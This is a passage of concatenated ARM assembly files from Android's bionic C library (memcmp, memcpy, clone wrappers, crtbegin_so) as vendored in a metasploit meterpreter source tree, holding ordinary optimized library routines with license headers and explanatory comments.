.byte 0, 1, 2, 13, 3, 7, 0, 14 /* 0- 7 */
.byte 4, 0, 8, 0, 0, 0, 0, 15 /* 8-15 */
.byte 11, 5, 0, 0, 9, 0, 0, 26 /* 16-23 */
.byte 0, 0, 0, 0, 0, 22, 28, 16 /* 24-31 */
.byte 32, 12, 6, 0, 0, 0, 0, 0 /* 32-39 */
.byte 10, 0, 0, 25, 0, 0, 21, 27 /* 40-47 */
.byte 31, 0, 0, 0, 0, 24, 0, 20 /* 48-55 */
.byte 30, 0, 23, 19, 29, 18, 17, 0 /* 56-63 */
#else
/* ARMv5+: ffs = 32 - clz(isolated bit).  Both instructions are
 * skipped when the input was 0, leaving r0 = 0. */
clzne r0, r0
rsbne r0, r0, #32
bx lr
#endif
|
OpenWireSec/metasploit | 8,578 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/memcmp.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/cpu-features.h>
.text
.global memcmp
.type memcmp, %function
.align 4
/*
* Optimized memcmp() for ARM9.
* This would not be optimal on XScale or ARM11, where more prefetching
* and use of PLD will be needed.
* The 2 major optimzations here are
* (1) The main loop compares 16 bytes at a time
* (2) The loads are scheduled in a way they won't stall
*/
/*
 * int memcmp(const void *s1, const void *s2, size_t n)
 *
 * In:  r0 = s1, r1 = s2, r2 = n
 * Out: r0 = difference of the first mismatching bytes (s1[i] - s2[i]),
 *      or 0 if the buffers compare equal.
 * Clobbers: r2, r3, ip, lr (r4-r7 saved/restored where used).
 *
 * Strategy: align s1 to a word boundary, then pick one of three inner
 * loops depending on (s1 ^ s2) & 3: word-congruent pointers (32 bytes
 * per iteration), half-word offset (specialized), or byte offset 1/3
 * (generic shift-and-merge).
 */
memcmp:
.fnstart
PLD (r0, #0)
PLD (r1, #0)
/* take care of the case where length is 0 or the buffers are the same */
cmp r0, r1
cmpne r2, #0
moveq r0, #0
bxeq lr
.save {r4, lr}
/* save registers */
stmfd sp!, {r4, lr}
PLD (r0, #32)
PLD (r1, #32)
/* since r0 holds the result, move the first source
 * pointer somewhere else
 */
mov r4, r0
/* make sure we have at least 8+4 bytes, this simplifies things below
 * and avoids some overhead for small blocks
 */
cmp r2, #(8+4)
bmi 8f
/* align first pointer to word boundary
 * offset = -src & 3
 */
rsb r3, r4, #0
ands r3, r3, #3
beq 0f
/* align first pointer, comparing the leading 1-3 bytes as we go */
sub r2, r2, r3
1: ldrb r0, [r4], #1
ldrb ip, [r1], #1
subs r0, r0, ip
bne 9f
subs r3, r3, #1
bne 1b
0: /* here the first pointer is aligned, and we have at least 4 bytes
 * to process.
 */
/* see if the pointers are congruent */
eor r0, r4, r1
ands r0, r0, #3
bne 5f
/* congruent case, 32 bytes per iteration
 * We need to make sure there are at least 32+4 bytes left
 * because we effectively read ahead one word, and we could
 * read past the buffer (and segfault) if we're not careful.
 */
ldr ip, [r1]
subs r2, r2, #(32 + 4)
bmi 1f
0: PLD (r4, #64)
PLD (r1, #64)
ldr r0, [r4], #4
ldr lr, [r1, #4]!
eors r0, r0, ip
ldreq r0, [r4], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r4], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r4], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r4], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r4], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r4], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r4], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
bne 2f
subs r2, r2, #32
bhs 0b
/* do we have at least 4 bytes left? */
1: adds r2, r2, #(32 - 4 + 4)
bmi 4f
/* finish off 4 bytes at a time */
3: ldr r0, [r4], #4
ldr ip, [r1], #4
eors r0, r0, ip
bne 2f
subs r2, r2, #4
bhs 3b
/* are we done? */
4: adds r2, r2, #4
moveq r0, #0
beq 9f
/* finish off the remaining bytes */
b 8f
2: /* the last 4 bytes are different, restart them bytewise */
sub r4, r4, #4
sub r1, r1, #4
mov r2, #4
/* process the last few bytes */
8: ldrb r0, [r4], #1
ldrb ip, [r1], #1
// stall
subs r0, r0, ip
bne 9f
subs r2, r2, #1
bne 8b
9: /* restore registers and return */
ldmfd sp!, {r4, lr}
bx lr
.fnend
5: /*************** non-congruent case ***************/
and r0, r1, #3
cmp r0, #2
bne 4f
/* here, offset is 2 (16-bits aligned, special cased) */
/* make sure we have at least 16 bytes to process */
subs r2, r2, #16
addmi r2, r2, #16
bmi 8b
/* align the unaligned pointer */
bic r1, r1, #3
ldr lr, [r1], #4
6: PLD (r1, #64)
PLD (r4, #64)
mov ip, lr, lsr #16
ldr lr, [r1], #4
ldr r0, [r4], #4
orr ip, ip, lr, lsl #16
eors r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r4], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r4], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r4], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
bne 7f
subs r2, r2, #16
bhs 6b
sub r1, r1, #2
/* are we done? */
adds r2, r2, #16
moveq r0, #0
beq 9b
/* finish off the remaining bytes */
b 8b
7: /* fix up the 2 pointers and fallthrough... */
sub r1, r1, #(4+2)
sub r4, r4, #4
mov r2, #4
b 8b
4: /*************** offset is 1 or 3 (less optimized) ***************/
stmfd sp!, {r5, r6, r7}
// r5 = rhs
// r6 = lhs
// r7 = scratch
mov r5, r0, lsl #3 /* r5 = right shift */
rsb r6, r5, #32 /* r6 = left shift */
/* align the unaligned pointer */
bic r1, r1, #3
ldr r7, [r1], #4
sub r2, r2, #8
6: mov ip, r7, lsr r5
ldr r7, [r1], #4
ldr r0, [r4], #4
orr ip, ip, r7, lsl r6
eors r0, r0, ip
moveq ip, r7, lsr r5
ldreq r7, [r1], #4
ldreq r0, [r4], #4
orreq ip, ip, r7, lsl r6
eoreqs r0, r0, ip
bne 7f
subs r2, r2, #8
bhs 6b
sub r1, r1, r6, lsr #3
ldmfd sp!, {r5, r6, r7}
/* are we done? */
adds r2, r2, #8
moveq r0, #0
beq 9b
/* finish off the remaining bytes */
b 8b
7: /* fix up the 2 pointers and fallthrough... */
sub r1, r1, #4
sub r1, r1, r6, lsr #3
sub r4, r4, #4
mov r2, #4
ldmfd sp!, {r5, r6, r7}
b 8b
|
OpenWireSec/metasploit | 15,072 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/memcpy.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/cpu-features.h>
#if defined(__ARM_NEON__)
.text
.fpu neon
.global memcpy
.type memcpy, %function
.align 4
/* a prefetch distance of 4 cache-lines works best experimentally */
#define CACHE_LINE_SIZE 64
#define PREFETCH_DISTANCE (CACHE_LINE_SIZE*4)
/*
 * void *memcpy(void *dst, const void *src, size_t n)  -- NEON variant
 *
 * In:  r0 = dst, r1 = src, r2 = n
 * Out: r0 = dst (original pointer, restored from the stack on exit)
 *
 * Aligns dst to 16 bytes with small scalar/NEON copies, then streams
 * 64 bytes per iteration through q0-q3 with aggressive PLD prefetch,
 * finishing with 32/16/8/4/1-byte tails.
 */
memcpy:
.fnstart
.save {r0, lr}
stmfd sp!, {r0, lr}
/* start preloading as early as possible */
pld [r1, #(CACHE_LINE_SIZE*0)]
pld [r1, #(CACHE_LINE_SIZE*1)]
/* do we have at least 16-bytes to copy (needed for alignment below) */
cmp r2, #16
blo 5f
/* align destination to half cache-line for the write-buffer */
rsb r3, r0, #0
ands r3, r3, #0xF
beq 0f
/* copy up to 15-bytes (count in r3) */
sub r2, r2, r3
movs ip, r3, lsl #31
ldrmib lr, [r1], #1
strmib lr, [r0], #1
ldrcsb ip, [r1], #1
ldrcsb lr, [r1], #1
strcsb ip, [r0], #1
strcsb lr, [r0], #1
movs ip, r3, lsl #29
bge 1f
// copies 4 bytes, destination 32-bits aligned
vld4.8 {d0[0], d1[0], d2[0], d3[0]}, [r1]!
vst4.8 {d0[0], d1[0], d2[0], d3[0]}, [r0, :32]!
1: bcc 2f
// copies 8 bytes, destination 64-bits aligned
vld1.8 {d0}, [r1]!
vst1.8 {d0}, [r0, :64]!
2:
0: /* preload immediately the next cache line, which we may need */
pld [r1, #(CACHE_LINE_SIZE*0)]
pld [r1, #(CACHE_LINE_SIZE*1)]
/* make sure we have at least 64 bytes to copy */
subs r2, r2, #64
blo 2f
/* preload all the cache lines we need.
 * NOTE: the number of pld below depends on PREFETCH_DISTANCE,
 * ideally we would increase the distance in the main loop to
 * avoid the goofy code below. In practice this doesn't seem to make
 * a big difference.
 */
pld [r1, #(CACHE_LINE_SIZE*2)]
pld [r1, #(CACHE_LINE_SIZE*3)]
pld [r1, #(PREFETCH_DISTANCE)]
1: /* The main loop copies 64 bytes at a time */
vld1.8 {d0 - d3}, [r1]!
vld1.8 {d4 - d7}, [r1]!
pld [r1, #(PREFETCH_DISTANCE)]
subs r2, r2, #64
vst1.8 {d0 - d3}, [r0, :128]!
vst1.8 {d4 - d7}, [r0, :128]!
bhs 1b
2: /* fix-up the remaining count and make sure we have >= 32 bytes left */
add r2, r2, #64
subs r2, r2, #32
blo 4f
3: /* 32 bytes at a time. These cache lines were already preloaded */
vld1.8 {d0 - d3}, [r1]!
subs r2, r2, #32
vst1.8 {d0 - d3}, [r0, :128]!
bhs 3b
4: /* less than 32 left */
add r2, r2, #32
tst r2, #0x10
beq 5f
// copies 16 bytes, 128-bits aligned
vld1.8 {d0, d1}, [r1]!
vst1.8 {d0, d1}, [r0, :128]!
5: /* copy up to 15-bytes (count in r2) */
movs ip, r2, lsl #29
bcc 1f
vld1.8 {d0}, [r1]!
vst1.8 {d0}, [r0]!
1: bge 2f
vld4.8 {d0[0], d1[0], d2[0], d3[0]}, [r1]!
vst4.8 {d0[0], d1[0], d2[0], d3[0]}, [r0]!
2: movs ip, r2, lsl #31
ldrmib r3, [r1], #1
ldrcsb ip, [r1], #1
ldrcsb lr, [r1], #1
strmib r3, [r0], #1
strcsb ip, [r0], #1
strcsb lr, [r0], #1
ldmfd sp!, {r0, lr}
bx lr
.fnend
#else /* __ARM_ARCH__ < 7 */
.text
.global memcpy
.type memcpy, %function
.align 4
/*
* Optimized memcpy() for ARM.
*
* note that memcpy() always returns the destination pointer,
* so we have to preserve R0.
*/
/*
 * void *memcpy(void *dst, const void *src, size_t n)  -- pre-NEON variant
 *
 * In:  r0 = dst, r1 = src, r2 = n
 * Out: r0 = dst (original pointer, restored from the stack on exit)
 *
 * Aligns src to a word boundary, then either bulk-copies 32 bytes per
 * iteration when src and dst are word-congruent, or merges words with
 * immediate shifts of 8/16/24 bits when they are not.
 */
memcpy:
/* The stack must always be 64-bits aligned to be compliant with the
 * ARM ABI. Since we have to save R0, we might as well save R4
 * which we can use for better pipelining of the reads below
 */
.fnstart
.save {r0, r4, lr}
stmfd sp!, {r0, r4, lr}
/* Making room for r5-r11 which will be spilled later */
.pad #28
sub sp, sp, #28
// preload the destination because we'll align it to a cache line
// with small writes. Also start the source "pump".
PLD (r0, #0)
PLD (r1, #0)
PLD (r1, #32)
/* it simplifies things to take care of len<4 early */
cmp r2, #4
blo copy_last_3_and_return
/* compute the offset to align the source
 * offset = (4-(src&3))&3 = -src & 3
 */
rsb r3, r1, #0
ands r3, r3, #3
beq src_aligned
/* align source to 32 bits. We need to insert 2 instructions between
 * a ldr[b|h] and str[b|h] because byte and half-word instructions
 * stall 2 cycles.
 */
movs r12, r3, lsl #31
sub r2, r2, r3 /* we know that r3 <= r2 because r2 >= 4 */
ldrmib r3, [r1], #1
ldrcsb r4, [r1], #1
ldrcsb r12,[r1], #1
strmib r3, [r0], #1
strcsb r4, [r0], #1
strcsb r12,[r0], #1
src_aligned:
/* see if src and dst are aligned together (congruent) */
eor r12, r0, r1
tst r12, #3
bne non_congruent
/* Use post-increment mode for stm to spill r5-r11 to reserved stack
 * frame. Don't update sp.
 */
stmea sp, {r5-r11}
/* align the destination to a cache-line */
rsb r3, r0, #0
ands r3, r3, #0x1C
beq congruent_aligned32
cmp r3, r2
andhi r3, r2, #0x1C
/* conditionally copies 0 to 7 words (length in r3) */
movs r12, r3, lsl #28
ldmcsia r1!, {r4, r5, r6, r7} /* 16 bytes */
ldmmiia r1!, {r8, r9} /* 8 bytes */
stmcsia r0!, {r4, r5, r6, r7}
stmmiia r0!, {r8, r9}
tst r3, #0x4
ldrne r10,[r1], #4 /* 4 bytes */
strne r10,[r0], #4
sub r2, r2, r3
congruent_aligned32:
/*
 * here source is aligned to 32 bytes.
 */
cached_aligned32:
subs r2, r2, #32
blo less_than_32_left
/*
 * We preload a cache-line up to 64 bytes ahead. On the 926, this will
 * stall only until the requested word is fetched, but the linefill
 * continues in the background.
 * While the linefill is going, we write our previous cache-line
 * into the write-buffer (which should have some free space).
 * When the linefill is done, the writebuffer will
 * start dumping its content into memory
 *
 * While all this is going, we then load a full cache line into
 * 8 registers, this cache line should be in the cache by now
 * (or partly in the cache).
 *
 * This code should work well regardless of the source/dest alignment.
 *
 */
// Align the preload register to a cache-line because the cpu does
// "critical word first" (the first word requested is loaded first).
bic r12, r1, #0x1F
add r12, r12, #64
1: ldmia r1!, { r4-r11 }
PLD (r12, #64)
subs r2, r2, #32
// NOTE: if r12 is more than 64 ahead of r1, the following ldrhi
// for ARM9 preload will not be safely guarded by the preceding subs.
// When it is safely guarded the only possibility to have SIGSEGV here
// is because the caller overstates the length.
ldrhi r3, [r12], #32 /* cheap ARM9 preload */
stmia r0!, { r4-r11 }
bhs 1b
add r2, r2, #32
less_than_32_left:
/*
 * less than 32 bytes left at this point (length in r2)
 */
/* skip all this if there is nothing to do, which should
 * be a common case (if not executed the code below takes
 * about 16 cycles)
 */
tst r2, #0x1F
beq 1f
/* conditionally copies 0 to 31 bytes */
movs r12, r2, lsl #28
ldmcsia r1!, {r4, r5, r6, r7} /* 16 bytes */
ldmmiia r1!, {r8, r9} /* 8 bytes */
stmcsia r0!, {r4, r5, r6, r7}
stmmiia r0!, {r8, r9}
movs r12, r2, lsl #30
ldrcs r3, [r1], #4 /* 4 bytes */
ldrmih r4, [r1], #2 /* 2 bytes */
strcs r3, [r0], #4
strmih r4, [r0], #2
tst r2, #0x1
ldrneb r3, [r1] /* last byte */
strneb r3, [r0]
/* we're done! restore everything and return */
1: ldmfd sp!, {r5-r11}
ldmfd sp!, {r0, r4, lr}
bx lr
/********************************************************************/
non_congruent:
/*
 * here source is aligned to 4 bytes
 * but destination is not.
 *
 * in the code below r2 is the number of bytes read
 * (the number of bytes written is always smaller, because we have
 * partial words in the shift queue)
 */
cmp r2, #4
blo copy_last_3_and_return
/* Use post-increment mode for stm to spill r5-r11 to reserved stack
 * frame. Don't update sp.
 */
stmea sp, {r5-r11}
/* compute shifts needed to align src to dest */
rsb r5, r0, #0
and r5, r5, #3 /* r5 = # bytes in partial words */
mov r12, r5, lsl #3 /* r12 = right */
rsb lr, r12, #32 /* lr = left */
/* read the first word */
ldr r3, [r1], #4
sub r2, r2, #4
/* write a partial word (0 to 3 bytes), such that destination
 * becomes aligned to 32 bits (r5 = nb of words to copy for alignment)
 */
movs r5, r5, lsl #31
strmib r3, [r0], #1
movmi r3, r3, lsr #8
strcsb r3, [r0], #1
movcs r3, r3, lsr #8
strcsb r3, [r0], #1
movcs r3, r3, lsr #8
cmp r2, #4
blo partial_word_tail
/* Align destination to 32 bytes (cache line boundary) */
1: tst r0, #0x1c
beq 2f
ldr r5, [r1], #4
sub r2, r2, #4
orr r4, r3, r5, lsl lr
mov r3, r5, lsr r12
str r4, [r0], #4
cmp r2, #4
bhs 1b
blo partial_word_tail
/* copy 32 bytes at a time */
2: subs r2, r2, #32
blo less_than_thirtytwo
/* Use immediate mode for the shifts, because there is an extra cycle
 * for register shifts, which could account for up to 50% of
 * performance hit.
 */
cmp r12, #24
beq loop24
cmp r12, #8
beq loop8
loop16:
ldr r12, [r1], #4
1: mov r4, r12
ldmia r1!, { r5,r6,r7, r8,r9,r10,r11}
PLD (r1, #64)
subs r2, r2, #32
ldrhs r12, [r1], #4
orr r3, r3, r4, lsl #16
mov r4, r4, lsr #16
orr r4, r4, r5, lsl #16
mov r5, r5, lsr #16
orr r5, r5, r6, lsl #16
mov r6, r6, lsr #16
orr r6, r6, r7, lsl #16
mov r7, r7, lsr #16
orr r7, r7, r8, lsl #16
mov r8, r8, lsr #16
orr r8, r8, r9, lsl #16
mov r9, r9, lsr #16
orr r9, r9, r10, lsl #16
mov r10, r10, lsr #16
orr r10, r10, r11, lsl #16
stmia r0!, {r3,r4,r5,r6, r7,r8,r9,r10}
mov r3, r11, lsr #16
bhs 1b
b less_than_thirtytwo
loop8:
ldr r12, [r1], #4
1: mov r4, r12
ldmia r1!, { r5,r6,r7, r8,r9,r10,r11}
PLD (r1, #64)
subs r2, r2, #32
ldrhs r12, [r1], #4
orr r3, r3, r4, lsl #24
mov r4, r4, lsr #8
orr r4, r4, r5, lsl #24
mov r5, r5, lsr #8
orr r5, r5, r6, lsl #24
mov r6, r6, lsr #8
orr r6, r6, r7, lsl #24
mov r7, r7, lsr #8
orr r7, r7, r8, lsl #24
mov r8, r8, lsr #8
orr r8, r8, r9, lsl #24
mov r9, r9, lsr #8
orr r9, r9, r10, lsl #24
mov r10, r10, lsr #8
orr r10, r10, r11, lsl #24
stmia r0!, {r3,r4,r5,r6, r7,r8,r9,r10}
mov r3, r11, lsr #8
bhs 1b
b less_than_thirtytwo
loop24:
ldr r12, [r1], #4
1: mov r4, r12
ldmia r1!, { r5,r6,r7, r8,r9,r10,r11}
PLD (r1, #64)
subs r2, r2, #32
ldrhs r12, [r1], #4
orr r3, r3, r4, lsl #8
mov r4, r4, lsr #24
orr r4, r4, r5, lsl #8
mov r5, r5, lsr #24
orr r5, r5, r6, lsl #8
mov r6, r6, lsr #24
orr r6, r6, r7, lsl #8
mov r7, r7, lsr #24
orr r7, r7, r8, lsl #8
mov r8, r8, lsr #24
orr r8, r8, r9, lsl #8
mov r9, r9, lsr #24
orr r9, r9, r10, lsl #8
mov r10, r10, lsr #24
orr r10, r10, r11, lsl #8
stmia r0!, {r3,r4,r5,r6, r7,r8,r9,r10}
mov r3, r11, lsr #24
bhs 1b
less_than_thirtytwo:
/* copy the last 0 to 31 bytes of the source */
rsb r12, lr, #32 /* we corrupted r12, recompute it */
add r2, r2, #32
cmp r2, #4
blo partial_word_tail
1: ldr r5, [r1], #4
sub r2, r2, #4
orr r4, r3, r5, lsl lr
mov r3, r5, lsr r12
str r4, [r0], #4
cmp r2, #4
bhs 1b
partial_word_tail:
/* we have a partial word in the input buffer */
movs r5, lr, lsl #(31-3)
strmib r3, [r0], #1
movmi r3, r3, lsr #8
strcsb r3, [r0], #1
movcs r3, r3, lsr #8
strcsb r3, [r0], #1
/* Refill spilled registers from the stack. Don't update sp. */
ldmfd sp, {r5-r11}
copy_last_3_and_return:
movs r2, r2, lsl #31 /* copy remaining 0, 1, 2 or 3 bytes */
ldrmib r2, [r1], #1
ldrcsb r3, [r1], #1
ldrcsb r12,[r1]
strmib r2, [r0], #1
strcsb r3, [r0], #1
strcsb r12,[r0]
/* we're done! restore sp and spilled registers and return */
add sp, sp, #28
ldmfd sp!, {r0, r4, lr}
bx lr
.fnend
#endif /* __ARM_ARCH__ < 7 */
|
OpenWireSec/metasploit | 3,583 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/clone.S | /*
* Copyright (C) 2008-2010 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.text
.type __pthread_clone, #function
.global __pthread_clone
.align 4
.fnstart
@ pid_t __pthread_clone(int (*fn)(void*), void *child_stack,
@                       int flags, void *arg)
@ In:  r0 = fn, r1 = child_stack (top), r2 = flags, r3 = arg
@ Out: parent gets the child's pid (or -1 on error); the child never
@      returns here - it jumps into __thread_entry(fn, arg, tls).
__pthread_clone:
@ insert the args onto the new stack so the child can fetch them
str r0, [r1, #-4]
str r3, [r1, #-8]
@ do the system call
@ get flags
mov r0, r2
@ new sp is already in r1
#if __ARM_EABI__
stmfd sp!, {r4, r7}
ldr r7, =__NR_clone
swi #0
#else
swi #__NR_clone
#endif
movs r0, r0
#if __ARM_EABI__
@ r0 != 0 means parent or error: pop the saved regs from the parent
@ stack.  The child (r0 == 0) runs on the new stack and has nothing
@ to restore.
ldmnefd sp!, {r4, r7}
#endif
blt __error
bxne lr
@ pick the function arg and call address off the stack and jump
@ to the C __thread_entry function which does some setup and then
@ calls the thread's start function
ldr r0, [sp, #-4]
ldr r1, [sp, #-8]
mov r2, sp @ __thread_entry needs the TLS pointer
b __thread_entry
__error:
@ NOTE(review): raw failure path - returns -1 without updating errno
mov r0, #-1
bx lr
.fnend
#
# This function is defined as:
#
# pid_t __bionic_clone( int flags, void *child_stack,
# pid_t *pid, void *tls, pid_t *ctid,
# int (*fn)(void *), void* arg );
#
# NOTE: This is not the same signature as the GLibc
# __clone function here !! Placing 'fn' and 'arg'
# at the end of the parameter list makes the
# implementation much simpler.
#
.type __bionic_clone, #function
.globl __bionic_clone
.align 4
.fnstart
__bionic_clone:
mov ip, sp @ ip -> the three stack-passed C args (ctid, fn, arg)
.save {r4, r5, r6, r7}
# save registers to parent stack
stmfd sp!, {r4, r5, r6, r7}
# load extra parameters
ldmfd ip, {r4, r5, r6} @ r4 = ctid, r5 = fn, r6 = arg
# store 'fn' and 'arg' to the child stack
str r5, [r1, #-4]
str r6, [r1, #-8]
# system call
ldr r7, =__NR_clone
swi #0
movs r0, r0 @ Z set -> we are in the child
beq 1f
# in parent, reload saved registers
# then either exit or error
#
ldmfd sp!, {r4, r5, r6, r7}
bxne lr @ tid > 0: success, return it
b __set_syscall_errno @ tid < 0: convert to errno / -1
1: # in the child - pick arguments
ldr r0, [sp, #-4] @ r0 = fn (sp is the child stack written above)
ldr r1, [sp, #-8] @ r1 = arg
b __bionic_clone_entry
.fnend
|
OpenWireSec/metasploit | 1,961 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/crtbegin_so.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
# Implement static C++ destructors when the shared
# library is unloaded through dlclose().
#
# A call to this function must be the first entry
# in the .fini_array. See 3.3.5.3.C of C++ ABI
# standard.
#
__on_dlclose:
adr r0, 0f @ r0 = address of the literal word below
ldr r0, [r0] @ r0 = __dso_handle for this shared object
b __cxa_finalize @ tail-call: run destructors registered for this DSO
0:
.long __dso_handle
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1 @ sentinel word; real entries are appended by the linker
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1 @ sentinel word
.long __on_dlclose @ must stay the first real entry (see comment above)
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 1,472 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/__get_sp.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
